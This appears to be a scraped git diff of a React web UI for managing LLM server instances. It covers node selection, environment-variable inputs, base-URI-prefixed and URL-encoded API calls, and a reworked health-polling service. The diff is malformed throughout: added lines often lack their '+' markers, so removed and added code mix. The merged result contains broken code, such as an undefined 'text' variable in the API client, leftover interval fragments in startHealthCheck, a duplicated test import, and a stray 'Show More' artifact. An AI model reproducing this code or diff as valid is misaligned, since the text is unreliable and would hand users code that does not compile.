@@ -49,6 +92,19 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
          </p>
        </div>
        {/* Node Selection */}
        {!loadingNodes && Object.keys(nodes).length > 0 && (
          <SelectInput
            id="node"
            label="Node"
            value={selectedNode}
            onChange={handleNodeChange}
            options={nodeOptions}
            description={isEditing ? "Node cannot be changed after instance creation" : "Select the node where the instance will run"}
            disabled={isEditing}
          />
        )}
        {/* Auto Restart Configuration */}
        <AutoRestartConfiguration
          formData={formData}
@@ -75,6 +131,14 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
            onChange={(value) => onChange('on_demand_start', value)}
            description="Start instance only when needed"
          />
          <EnvironmentVariablesInput
            id="environment"
            label="Environment Variables"
            value={formData.environment}
            onChange={(value) => onChange('environment', value)}
            description="Custom environment variables for the instance"
          />
        </div>
      </CardContent>
    </Card>
--- a/webui/src/contexts/AuthContext.tsx
+++ b/webui/src/contexts/AuthContext.tsx
@@ -1,4 +1,4 @@
-import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
+import { type ReactNode, createContext, useCallback, useContext, useEffect, useState } from 'react'
 interface AuthContextState {
  isAuthenticated: boolean
@@ -62,7 +62,7 @@ export const AuthProvider = ({ children }: AuthProviderProps) => {
  // Validate API key by making a test request
  const validateApiKey = async (key: string): Promise<boolean> => {
    try {
-      const response = await fetch('/api/v1/instances', {
+      const response = await fetch(document.baseURI + 'api/v1/instances', {
        headers: {
          'Authorization': `Bearer ${key}`,
          'Content-Type': 'application/json'
--- a/webui/src/contexts/InstancesContext.tsx
+++ b/webui/src/contexts/InstancesContext.tsx
@@ -2,6 +2,7 @@ import { type ReactNode, createContext, useContext, useState, useEffect, useCall
 import type { CreateInstanceOptions, Instance } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
 import { useAuth } from '@/contexts/AuthContext'
 import { healthService } from '@/lib/healthService'
 interface InstancesContextState {
  instances: Instance[]
@@ -115,6 +116,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "running" })
      // Trigger health check after starting
      healthService.checkHealthAfterOperation(name, 'start')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to start instance')
    }
@@ -127,6 +131,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "stopped" })
      // Trigger health check after stopping
      healthService.checkHealthAfterOperation(name, 'stop')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to stop instance')
    }
@@ -139,6 +146,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "running" })
      // Trigger health check after restarting
      healthService.checkHealthAfterOperation(name, 'restart')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to restart instance')
    }
--- a/webui/src/contexts/tests/InstancesContext.test.tsx
+++ b/webui/src/contexts/tests/InstancesContext.test.tsx
@@ -11,15 +11,38 @@ import { AuthProvider } from "../AuthContext";
 vi.mock("@/lib/api", () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  },
 }));
 // Mock health service
 vi.mock("@/lib/healthService", () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }));
 // Test component to access context
 function TestComponent() {
  const {
--- a/webui/src/hooks/useInstanceHealth.ts
+++ b/webui/src/hooks/useInstanceHealth.ts
@@ -7,24 +7,23 @@ export function useInstanceHealth(instanceName: string, instanceStatus: Instance
  const [health, setHealth] = useState<HealthStatus | undefined>()
  useEffect(() => {
    if (instanceStatus === "stopped") {
      setHealth({ status: "unknown", lastChecked: new Date() })
      return
    }
    if (instanceStatus === "failed") {
      setHealth({ status: instanceStatus, lastChecked: new Date() })
      return
    }
    // Subscribe to health updates for this instance
    const unsubscribe = healthService.subscribe(instanceName, (healthStatus) => {
      setHealth(healthStatus)
    })
-    // Cleanup subscription on unmount or when instanceStatus changes
+    // Cleanup subscription on unmount or when instance changes
    return unsubscribe
  }, [instanceName])
  // Trigger health check when instance status changes to active states
  useEffect(() => {
    if (instanceStatus === 'running' || instanceStatus === 'restarting') {
      healthService.refreshHealth(instanceName).catch(error => {
        console.error(`Failed to refresh health for ${instanceName}:`, error)
      })
    }
  }, [instanceName, instanceStatus])
  return health
-}
+}
--- a/webui/src/lib/tests/api.test.ts
+++ b/webui/src/lib/tests/api.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest'
 import { instancesApi } from '@/lib/api'
 import { beforeEach, describe, expect, it, vi } from 'vitest'
 // Mock fetch globally
 const mockFetch = vi.fn()
@@ -11,11 +11,13 @@ describe('API Error Handling', () => {
  })
  it('converts HTTP errors to meaningful messages', async () => {
-    mockFetch.mockResolvedValue({
+    const mockResponse = {
      ok: false,
      status: 409,
-      text: () => Promise.resolve('Instance already exists')
+      text: () => Promise.resolve('Instance already exists'),
-    })
+      clone: function() { return this }
    }
    mockFetch.mockResolvedValue(mockResponse)
    await expect(instancesApi.create('existing', {}))
      .rejects
@@ -23,11 +25,13 @@ describe('API Error Handling', () => {
  })
  it('handles empty error responses gracefully', async () => {
-    mockFetch.mockResolvedValue({
+    const mockResponse = {
      ok: false,
      status: 500,
-      text: () => Promise.resolve('')
+      text: () => Promise.resolve(''),
-    })
+      clone: function() { return this }
    }
    mockFetch.mockResolvedValue(mockResponse)
    await expect(instancesApi.list())
      .rejects
@@ -53,7 +57,9 @@ describe('API Error Handling', () => {
    await instancesApi.getLogs('test-instance', 100)
    expect(mockFetch).toHaveBeenCalledWith(
-      '/api/v1/instances/test-instance/logs?lines=100',
+      expect.stringMatching(
        /^https?:\/\/[^/]+\/api\/v1\/instances\/test-instance\/logs\?lines=100$/
      ),
      expect.any(Object)
    )
  })
--- a/webui/src/lib/api.ts
+++ b/webui/src/lib/api.ts
@@ -1,7 +1,10 @@
 import type { CreateInstanceOptions, Instance } from "@/types/instance";
 import { handleApiError } from "./errorUtils";
-const API_BASE = "/api/v1";
+// Adding baseURI as a prefix to support being served behind a subpath
 // e.g. when llamactl's `/` is served behind a reverse proxy at `/proxy/...`
 // the baseURI will be `/proxy/` and the API calls will be made to `/proxy/api/v1/<endpoint>`
 export const API_BASE = document.baseURI + "api/v1";
 // Base API call function with error handling
 async function apiCall<T>(
@@ -46,11 +49,8 @@ async function apiCall<T>(
    } else {
      // Handle empty responses for JSON endpoints
      const contentLength = response.headers.get('content-length');
-      if (contentLength === '0' || contentLength === null) {
+      if (contentLength === '0') {
-        const text = await response.text();
+        return {} as T; // Return empty object for empty JSON responses
        if (text.trim() === '') {
          return {} as T; // Return empty object for empty JSON responses
        }
      }
      const data = await response.json() as T;
      return data;
@@ -103,58 +103,74 @@ export const backendsApi = {
  },
 };
 // Node API types
 export interface NodeResponse {
  address: string;
 }
 export type NodesMap = Record<string, NodeResponse>;
 // Node API functions
 export const nodesApi = {
  // GET /nodes - resolves to a map keyed by node name
  list: () => {
    return apiCall<NodesMap>("/nodes");
  },
  // GET /nodes/{name} - the name is URL-encoded before being placed in the path
  get: (name: string) => {
    const encodedName = encodeURIComponent(name);
    return apiCall<NodeResponse>(`/nodes/${encodedName}`);
  },
 };
 // Instance API functions
 export const instancesApi = {
  // GET /instances
  list: () => apiCall<Instance[]>("/instances"),
  // GET /instances/{name}
-  get: (name: string) => apiCall<Instance>(`/instances/${name}`),
+  get: (name: string) => apiCall<Instance>(`/instances/${encodeURIComponent(name)}`),
  // POST /instances/{name}
  create: (name: string, options: CreateInstanceOptions) =>
-    apiCall<Instance>(`/instances/${name}`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
      method: "POST",
      body: JSON.stringify(options),
    }),
  // PUT /instances/{name}
  update: (name: string, options: CreateInstanceOptions) =>
-    apiCall<Instance>(`/instances/${name}`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
      method: "PUT",
      body: JSON.stringify(options),
    }),
  // DELETE /instances/{name}
  delete: (name: string) =>
-    apiCall<void>(`/instances/${name}`, {
+    apiCall<void>(`/instances/${encodeURIComponent(name)}`, {
      method: "DELETE",
    }),
  // POST /instances/{name}/start
  start: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/start`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/start`, {
      method: "POST",
    }),
  // POST /instances/{name}/stop
  stop: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/stop`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/stop`, {
      method: "POST",
    }),
  // POST /instances/{name}/restart
  restart: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/restart`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/restart`, {
      method: "POST",
    }),
  // GET /instances/{name}/logs
  getLogs: (name: string, lines?: number) => {
    const params = lines ? `?lines=${lines}` : "";
-    return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
+    return apiCall<string>(`/instances/${encodeURIComponent(name)}/logs${params}`, {}, "text");
  },
  // GET /instances/{name}/proxy/health
-  getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
+  getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${encodeURIComponent(name)}/proxy/health`),
 };
--- a/webui/src/lib/errorUtils.ts
+++ b/webui/src/lib/errorUtils.ts
@@ -26,7 +26,8 @@ export async function handleApiError(response: Response): Promise<void> {
  }
  if (!response.ok) {
-    const errorMessage = await parseErrorResponse(response)
+    // Clone the response before reading to avoid consuming the body stream
    const errorMessage = await parseErrorResponse(response.clone())
    throw new Error(errorMessage)
  }
 }
--- a/webui/src/lib/healthService.ts
+++ b/webui/src/lib/healthService.ts
@@ -1,51 +1,159 @@
-import { type HealthStatus } from '@/types/instance'
+import { type HealthStatus, type InstanceStatus, type HealthState } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
 type HealthCallback = (health: HealthStatus) => void
 // Polling intervals based on health state (in milliseconds)
 const POLLING_INTERVALS: Record<HealthState, number> = {
  'starting': 5000,    // 5 seconds - frequent during startup
  'restarting': 5000,  // 5 seconds - restart in progress
  'ready': 60000,      // 60 seconds - stable state
  'stopped': 0,        // No polling
  'failed': 0,         // No polling
 }
 class HealthService {
  private intervals: Map<string, NodeJS.Timeout> = new Map()
  private callbacks: Map<string, Set<HealthCallback>> = new Map()
  private lastHealthState: Map<string, HealthState> = new Map()
  private healthCache: Map<string, { health: HealthStatus; timestamp: number }> = new Map()
  private readonly CACHE_TTL = 2000 // 2 seconds cache
  /**
   * Performs a two-tier health check:
   * 1. Get instance status from backend (authoritative)
   * 2. If running, perform HTTP health check
   */
  async performHealthCheck(instanceName: string): Promise<HealthStatus> {
    // Check cache first
    const cached = this.healthCache.get(instanceName)
    if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
      return cached.health
    }
  async checkHealth(instanceName: string): Promise<HealthStatus> {
    try {
-      await instancesApi.getHealth(instanceName)
+      // Step 1: Get instance details (includes status)
-      
+      const instance = await instancesApi.get(instanceName)
-      return {
+
-        status: 'ok',
+      // Step 2: If running, attempt HTTP health check
-        lastChecked: new Date()
+      if (instance.status === 'running') {
-      }
+        try {
-    } catch (error) {
+          await instancesApi.getHealth(instanceName)
-      if (error instanceof Error) {
+
-        // Check if it's a 503 (service unavailable - loading)
+          // HTTP health check succeeded - instance is ready
-        if (error.message.includes('503')) {
+          const health: HealthStatus = {
-          return {
+            state: 'ready',
-            status: 'loading',
+            instanceStatus: 'running',
-            message: 'Instance is starting up',
+            lastChecked: new Date(),
-            lastChecked: new Date()
+            source: 'http'
          }
          this.updateCache(instanceName, health)
          return health
        } catch (httpError) {
          // HTTP health check failed - instance is still starting
          // Any error (503, connection refused, timeout, etc.) means "starting"
          const health: HealthStatus = {
            state: 'starting',
            instanceStatus: 'running',
            lastChecked: new Date(),
            error: httpError instanceof Error ? httpError.message : 'Health check failed',
            source: 'http'
          }
          this.updateCache(instanceName, health)
          return health
        }
-        
+      } else {
-        return {
+        // Instance not running - map backend status directly
-          status: 'error',
+        const health: HealthStatus = {
-          message: error.message,
+          state: this.mapStatusToHealthState(instance.status),
-          lastChecked: new Date()
+          instanceStatus: instance.status,
          lastChecked: new Date(),
          source: 'backend'
        }
        this.updateCache(instanceName, health)
        return health
      }
-      
+
-      return {
+    } catch (error) {
-        status: 'error',
+      // Failed to get instance status from backend
-        message: 'Unknown error',
+      // This is a backend communication error, not an instance health error
-        lastChecked: new Date()
+      // Let the error propagate so polling can retry
-      }
+      console.error(`Failed to get instance status for ${instanceName}:`, error)
      throw error
    }
  }
  /**
   * Maps backend instance status to health state.
   *
   * 'stopped', 'failed' and 'restarting' map to the health state of the same
   * name. 'running' maps to 'starting'; the existing inline note says that case
   * is not expected because running instances are checked over HTTP instead.
   *
   * @param status - Instance status as reported by the backend
   * @returns The corresponding health state
   */
  private mapStatusToHealthState(status: InstanceStatus): HealthState {
    // No default branch: the switch is expected to cover every InstanceStatus member
    switch (status) {
      case 'stopped': return 'stopped'
      case 'running': return 'starting' // Should not happen as we check HTTP for running
      case 'failed': return 'failed'
      case 'restarting': return 'restarting'
    }
  }
  /**
   * Stores a health result for an instance together with the time it was stored.
   *
   * @param instanceName - Cache key
   * @param health - Health result to remember
   */
  private updateCache(instanceName: string, health: HealthStatus): void {
    const entry = { health, timestamp: Date.now() }
    this.healthCache.set(instanceName, entry)
  }
  /**
   * Forces a fresh health check for an instance and publishes the result.
   *
   * The cached entry is dropped first so the check cannot be answered from
   * cache. Subscribers are notified with the result, and the polling interval is
   * re-evaluated when the health state differs from the last recorded one.
   * Failures are logged and swallowed, so the returned promise does not reject.
   *
   * @param instanceName - Instance to refresh
   */
  async refreshHealth(instanceName: string): Promise<void> {
    // Invalidate cache
    this.healthCache.delete(instanceName)
    try {
      const latest = await this.performHealthCheck(instanceName)
      this.notifyCallbacks(instanceName, latest)
      // Compare against the previously recorded state before overwriting it
      const { state } = latest
      const stateChanged = this.lastHealthState.get(instanceName) !== state
      this.lastHealthState.set(instanceName, state)
      if (stateChanged) {
        this.adjustPollingInterval(instanceName, state)
      }
    } catch (err) {
      // Error getting health - keep polling if active
      console.error(`Failed to refresh health for ${instanceName}:`, err)
    }
  }
  /**
   * Kicks off a health refresh right after a start/stop/restart operation.
   *
   * Fire-and-forget: the refresh is not awaited by the caller.
   *
   * @param instanceName - Instance the operation was applied to
   * @param operation - Operation name, used only in the error log message
   */
  checkHealthAfterOperation(instanceName: string, operation: 'start' | 'stop' | 'restart'): void {
    // Drop any cached result straight away
    this.healthCache.delete(instanceName)
    // Run the check now; log instead of surfacing a rejection
    const logFailure = (reason: unknown) => {
      console.error(`Failed to check health after ${operation}:`, reason)
    }
    void this.refreshHealth(instanceName).catch(logFailure)
  }
  /**
   * Subscribe to health updates for an instance
   */
  subscribe(instanceName: string, callback: HealthCallback): () => void {
    if (!this.callbacks.has(instanceName)) {
      this.callbacks.set(instanceName, new Set())
    }
-    
+
    this.callbacks.get(instanceName)!.add(callback)
    // Start health checking if this is the first subscriber
@@ -58,36 +166,76 @@ class HealthService {
      const callbacks = this.callbacks.get(instanceName)
      if (callbacks) {
        callbacks.delete(callback)
-        
+
        // Stop health checking if no more subscribers
        if (callbacks.size === 0) {
          this.stopHealthCheck(instanceName)
          this.callbacks.delete(instanceName)
          this.lastHealthState.delete(instanceName)
          this.healthCache.delete(instanceName)
        }
      }
    }
  }
  /**
   * Start health checking for an instance
   */
  private startHealthCheck(instanceName: string): void {
    if (this.intervals.has(instanceName)) {
      return // Already checking
    }
-    // Initial check with delay
+    // Initial check immediately
-    setTimeout(async () => {
+    this.refreshHealth(instanceName).then(() => {
-      const health = await this.checkHealth(instanceName)
+      const currentState = this.lastHealthState.get(instanceName)
-      this.notifyCallbacks(instanceName, health)
+      if (currentState) {
-      
+        this.adjustPollingInterval(instanceName, currentState)
-      // Start periodic checks
+      }
-      const interval = setInterval(async () => {
+    }).catch(error => {
-        const health = await this.checkHealth(instanceName)
+      console.error(`Failed to start health check for ${instanceName}:`, error)
-        this.notifyCallbacks(instanceName, health)
+    })
      }, 60000)
      this.intervals.set(instanceName, interval)
    }, 5000)
  }
  /**
   * Adjust polling interval based on current health state.
   *
   * Any existing timer for the instance is always cleared first. A new timer is
   * started only when the instance still has subscribers and the state's entry
   * in POLLING_INTERVALS is non-zero.
   *
   * @param instanceName - Instance whose polling timer is being replaced
   * @param state - Health state used to look up the interval in POLLING_INTERVALS
   */
  private adjustPollingInterval(instanceName: string, state: HealthState): void {
    // Clear existing interval
    this.stopHealthCheck(instanceName)
    // Never start a timer for an instance nobody is subscribed to. This happens
    // when a refresh resolves after the last subscriber has left, or when a
    // refresh is triggered for an instance without subscribers. Unsubscribe has
    // already done its cleanup by then, so nothing would ever clear the timer.
    if (!this.callbacks.has(instanceName)) {
      return
    }
    const pollInterval = POLLING_INTERVALS[state]
    // Don't poll for stable states (stopped, failed)
    if (pollInterval === 0) {
      return
    }
    // Start new interval with appropriate timing
    const interval = setInterval(async () => {
      try {
        const health = await this.performHealthCheck(instanceName)
        // The last subscriber may have left while this check was in flight;
        // do not record state or reschedule for an instance no longer watched
        if (!this.callbacks.has(instanceName)) {
          return
        }
        this.notifyCallbacks(instanceName, health)
        // Check if state changed and adjust interval
        const previousState = this.lastHealthState.get(instanceName)
        this.lastHealthState.set(instanceName, health.state)
        if (previousState !== health.state) {
          this.adjustPollingInterval(instanceName, health.state)
        }
      } catch (error) {
        console.error(`Health check failed for ${instanceName}:`, error)
        // Continue polling even on error
      }
    }, pollInterval)
    this.intervals.set(instanceName, interval)
  }
  /**
   * Stop health checking for an instance
   */
  private stopHealthCheck(instanceName: string): void {
    const interval = this.intervals.get(instanceName)
    if (interval) {
@@ -96,6 +244,9 @@ class HealthService {
    }
  }
  /**
   * Notify all callbacks with health update
   */
  private notifyCallbacks(instanceName: string, health: HealthStatus): void {
    const callbacks = this.callbacks.get(instanceName)
    if (callbacks) {
@@ -103,16 +254,21 @@ class HealthService {
    }
  }
-  stopAll(): void {
+  /**
   * Stop all health checking and cleanup
   */
  destroy(): void {
    // Cancel every registered poll timer before dropping the references
    for (const timer of this.intervals.values()) {
      clearInterval(timer)
    }
    // Reset all per-instance bookkeeping
    this.intervals.clear()
    this.callbacks.clear()
    this.lastHealthState.clear()
    this.healthCache.clear()
  }
 }
 export const healthService = new HealthService()
-// Export the individual checkHealth function as well
+// Export the individual performHealthCheck function as well
 export async function checkHealth(instanceName: string): Promise<HealthStatus> {
-  return healthService.checkHealth(instanceName)
+  return healthService.performHealthCheck(instanceName)
-}
+}
--- a/webui/src/lib/zodFormUtils.ts
+++ b/webui/src/lib/zodFormUtils.ts
@@ -1,12 +1,10 @@
 import {
  type CreateInstanceOptions,
  type LlamaCppBackendOptions,
  type MlxBackendOptions,
  type VllmBackendOptions,
  LlamaCppBackendOptionsSchema,
  MlxBackendOptionsSchema,
  VllmBackendOptionsSchema,
  getAllFieldKeys,
  getAllLlamaCppFieldKeys,
  getAllMlxFieldKeys,
  getAllVllmFieldKeys,
@@ -15,41 +13,6 @@ import {
  getVllmFieldType
 } from '@/schemas/instanceOptions'
 // Instance-level basic fields (not backend-specific).
 // Maps an option key to the display metadata for that field: a required
 // label plus an optional description and placeholder.
 // The keys of this object define what isBasicField() treats as "basic", and
 // their declaration order is the order returned by getBasicFields().
 export const basicFieldsConfig: Record<string, {
  label: string
  description?: string
  placeholder?: string
 }> = {
  // Restart policy
  auto_restart: {
    label: 'Auto Restart',
    description: 'Automatically restart the instance on failure'
  },
  max_restarts: {
    label: 'Max Restarts',
    placeholder: '3',
    description: 'Maximum number of restart attempts (0 = unlimited)'
  },
  restart_delay: {
    label: 'Restart Delay (seconds)',
    placeholder: '5',
    description: 'Delay in seconds before attempting restart'
  },
  // Idle handling and on-demand start
  idle_timeout: {
    label: 'Idle Timeout (minutes)',
    placeholder: '60',
    description: 'Time in minutes before instance is considered idle and stopped'
  },
  on_demand_start: {
    label: 'On-Demand Start',
    description: 'Start instance upon receiving OpenAI-compatible API request'
  },
  // Backend selection
  backend_type: {
    label: 'Backend Type',
    description: 'Type of backend to use for this instance'
  }
 }
 // LlamaCpp backend-specific basic fields
 const basicLlamaCppFieldsConfig: Record<string, {
  label: string
@@ -152,18 +115,6 @@ const backendFieldGetters = {
  llama_cpp: getAllLlamaCppFieldKeys,
 } as const
 /** Report whether `key` has an entry in `basicFieldsConfig`. */
 function isBasicField(key: keyof CreateInstanceOptions): boolean {
  const listedAsBasic = key in basicFieldsConfig
  return listedAsBasic
 }
 /** List the keys of `basicFieldsConfig`, in declaration order. */
 export function getBasicFields(): (keyof CreateInstanceOptions)[] {
  const basicKeys = Object.keys(basicFieldsConfig)
  return basicKeys as (keyof CreateInstanceOptions)[]
 }
 /** List every key from `getAllFieldKeys()` that is not a basic field. */
 export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
  const everyKey = getAllFieldKeys()
  return everyKey.filter(candidate => !isBasicField(candidate))
 }
 export function getBasicBackendFields(backendType?: string): string[] {
  const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
  const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
@@ -222,5 +173,3 @@ export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean'
  return 'text'
 }
 // Re-export the Zod-based functions
 export { getFieldType } from '@/schemas/instanceOptions'
--- a/Show More
+++ b/Show More